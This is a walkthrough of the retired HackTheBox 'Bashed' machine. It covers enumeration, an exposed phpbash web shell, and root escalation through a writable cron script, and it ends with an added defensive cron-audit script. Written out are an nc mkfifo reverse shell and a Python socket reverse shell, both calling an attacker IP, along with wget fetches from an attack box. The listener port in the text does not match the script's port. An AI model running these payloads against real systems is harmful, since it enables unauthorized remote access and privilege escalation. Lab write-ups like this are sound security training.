I’ve been doing some CTFs on HackTheBox.eu since early March, and Bashed is the first of the boxes I’ve rooted to be retired since then, making it my first walkthrough.
Let’s get started.
I always start with NMAP.
nmap -v -p 1-65535 -sV -O -sS -T4 10.10.10.68
This scan prints verbose output (-v), runs a stealth SYN scan (-sS) with T4 timing (faster), performs OS and version detection (-O, -sV), and covers the full port range (-p 1-65535).
The results of this scan indicate only 1 open port, and ALL other ports are closed. The open port is:
80/tcp http – Apache httpd 2.4.18 Ubuntu
So, we visit http://10.10.10.68, this gives us an amateur developer’s personal website. There’s no need to even view source or look too deep, because our developer is incredibly proud of his new PHP script that will launch a bash shell when you can’t get into a reverse shell. He even built it on this server!
Run dirb to enumerate your directories. Check each one… lucky for us, Arrexel has left his php scripts hanging out in the /dev directory.
Click on phpbash.php, and you’re in as user www-data. You can search for the user flag by entering find / -name user.txt | grep user.txt and the results will point you to the user.txt file in arrexel’s home directory. Cat that bad boy and move on to root.
Start a webserver on your attack box in order to host LinEnum or other scripts you may need: python -m SimpleHTTPServer 8080
Navigate to a directory we can write to; I used /tmp/, but there are others on this box.
On the target box, run wget http://10.10.X.X:8080/LinEnum.sh
Don’t forget to modify the file to be executable: chmod 777 LinEnum.sh, then execute:
Much like <machine name redacted as it hasn’t been retired yet>, we can sudo without a password as scriptmanager! More enumeration also shows us the /scripts directory where we have additional permissions as scriptmanager.
I set up a revshell.sh script in my attack box's http directory, and used wget from the web interface to grab it into the /tmp/ directory. The contents of the .sh was:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 1234 >/tmp/f
This is the workaround for when nc doesn't allow the -e option. Don't forget to chmod to make it executable. Start your listener with nc -lvp 1234.
From the web interface phpbash.php, I executed:
sudo -u scriptmanager './revshell.sh'
This gave me my first shell as scriptmanager. I navigated to the /scripts directory and noticed that the test.py script was owned by me, but test.txt was owned by root. I inspected the contents of test.py; it's just a script that opens and writes to that file as root. I noticed that test.txt had just been created, so I waited around a bit and refreshed the file listing every few minutes. It was never more than a minute old. So we know it's a cron job that runs as root, which means our shell will spawn as root.
On my attack box, I started a new nc listener on port 4444 (the port in the script must match the listener); I made a new test.py and included the following:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.X.X",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
I once again used wget from the scriptmanager shell I had, deleted the old test.py, and uploaded my edited version. I waited a few seconds, as this job appears to run every minute, and sure enough, I caught the shell. Navigate to /root and cat root.txt.
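The root cause of this escalation is a root cron job that executes a file a non-root user owns, so it is worth checking for on any box you administer. The following Python audit is an added example, not part of the original walkthrough; the crontab text and the file ownership table are constructed samples, and the CRON_LINE pattern handles only the system crontab format (per-user crontabs, which carry no user field, are out of scope).

```python
import os
import re
import stat
# Constructed sample in /etc/crontab format (5 time fields, user, command); the walkthrough only
# infers the per-minute root job from test.txt's age and never shows the actual entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
* * * * * root /scripts/test.py
* * * * * root /opt/backup/rotate.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
SHELL=/bin/sh
"""
# Constructed file metadata, path -> (owner, permission bits), standing in for os.stat() output.
SAMPLE_FILES = {
    "/scripts/test.py": ("scriptmanager", 0o755), "/scripts": ("scriptmanager", 0o755),
    "/opt/backup/rotate.sh": ("root", 0o755), "/opt/backup": ("root", 0o777),
}
# Five time fields (or an @reboot-style shortcut), then the user, then the command.
CRON_LINE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def parse_system_crontab(text):
    """Return (user, command) pairs, skipping comments, blank lines and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or re.match(r"^\s*\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            entries.append((m.group("user"), m.group("cmd")))
    return entries

def writable_by_others(mode):
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def weak_root_jobs(crontab_text, files):
    """Root-run jobs whose script (or its directory) a non-root user could replace."""
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        path = cmd.split()[0]
        if user != "root" or not path.startswith("/") or path not in files:
            continue  # non-root job, compound shell command or unknown file: not assessed here
        owner, mode = files[path]
        parent = os.path.dirname(path)
        parent_owner, parent_mode = files.get(parent, ("root", 0o755))
        if owner != "root":
            findings.append((path, f"owned by {owner}"))
        elif writable_by_others(mode):
            findings.append((path, "group/other writable"))
        elif parent_owner != "root" or writable_by_others(parent_mode):
            findings.append((path, f"directory {parent} writable by non-root"))
    return findings
```

On a live host, build the files map with os.stat() and pwd.getpwuid() for each script path and its parent directory, then pass the real /etc/crontab text; the fix for a hit is to make the script and its directory root-owned and not group/other writable.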